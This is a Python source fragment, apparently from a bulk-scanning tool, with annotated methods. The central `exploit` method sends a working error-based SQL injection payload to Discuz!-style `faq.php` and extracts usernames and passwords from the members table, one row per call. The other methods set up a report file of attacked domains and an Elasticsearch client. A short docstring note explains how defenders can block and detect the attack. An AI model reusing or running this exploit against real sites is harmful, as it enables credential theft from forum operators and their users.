def exploit(self, url, count=0):
    """Run one error-based SQL injection probe against ``faq.php`` on *url*.

    The request targets ``action=grouppermission`` with a crafted ``gids[]``
    value; this looks like the well-known Discuz! ``faq.php`` injection, but
    confirm against the target before relying on that.  Output is harvested
    from a MySQL "Duplicate entry" error that the page echoes back.

    Args:
        url: Target base URL; normalised by ``EXPHttp.get_standard_url``.
        count: Row offset fed into ``limit {count},1`` — one row of
            ``{prefix}_members`` is read per call, so callers page through
            rows by incrementing it.

    Returns:
        ``[username, password]`` (the matched string split on a single
        space) for the selected row, or ``None`` when the table prefix
        cannot be determined, the request yields no body, or the error
        text is not reflected in the response.

    Defender note: this only works when verbose database errors reach the
    HTTP response and the ``gids`` parameter is interpolated into SQL.
    Suppressing DB error output and parameterising that query removes the
    oracle; ``faq.php`` requests whose ``gids[]`` values contain SQL
    keywords or ``information_schema`` are a clear detection signal.
    """
    self.initialize()  # presumably resets per-run state; defined elsewhere — confirm
    httptools = EXPHttp()
    url = httptools.get_standard_url(url)
    # Append the vulnerable script name to the base URL.
    if url[-1] != '/':
        url = url + '/faq.php'
    elif url[-1] == '/':
        url = url + 'faq.php'
    else:
        pass  # unreachable: url[-1] is either '/' or not; kept as written
    # Table prefix is discovered by a name-mangled helper not shown here.
    table_pre = self.__get_table_pre(url)
    if not table_pre:
        return None
    # The group-by key is concat(<row>, floor(rand(0)*2)); the resulting
    # duplicate-key collision leaks <row> through the DB error message.
    para = "action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(username,0x20,password) from {table_pre}_members limit {start},1),floor(rand(0)*2))x from information_schema.tables group by x )a)%23".format(
        table_pre=table_pre, start=count)
    page_content = self.send_request(url, para)
    if not page_content:
        return None
    # ``[0,1]?`` is a character class (0, comma or 1) — presumably meant to
    # strip the 0/1 digit that floor(rand(0)*2) appends to the leaked value.
    pattern = re.compile(r"Duplicate entry '[0,1]?(.*?)[0,1]?'")
    infos = pattern.findall(page_content)
    if infos == []:
        print 'Exploit Failed'
        return None
    else:
        # 0x20 in the payload separates username and password with a space.
        return infos[0].split(' ')
def __init__(self, exploit_file):
    """Keep the exploit module, bind an Elasticsearch client and open the report file.

    ``file_name`` is a module-level global that must already be bound when
    this runs.  The report file is opened in append mode and is never closed
    here, so the instance owns the handle; because the header row is written
    on every construction, each new instance adds another header line.
    """
    global file_name
    self.exp = exploit_file
    # Hard-coded local Elasticsearch endpoint; not read from configuration.
    self.es = Elasticsearch('127.0.0.1:9200')
    report = open(file_name, 'a')
    self.file = report
    report.write('domain_list\t\t\tattack_results\n')
    self.httptools = EXPHttp()
def __init__(self):
    """Start with no exploit or keyword module loaded and a fresh HTTP helper."""
    # Both module slots begin unbound; presumably a loader elsewhere in the
    # file fills them in — confirm against the caller.
    self.exp_module = self.keywords_module = None
    self.httptools = EXPHttp()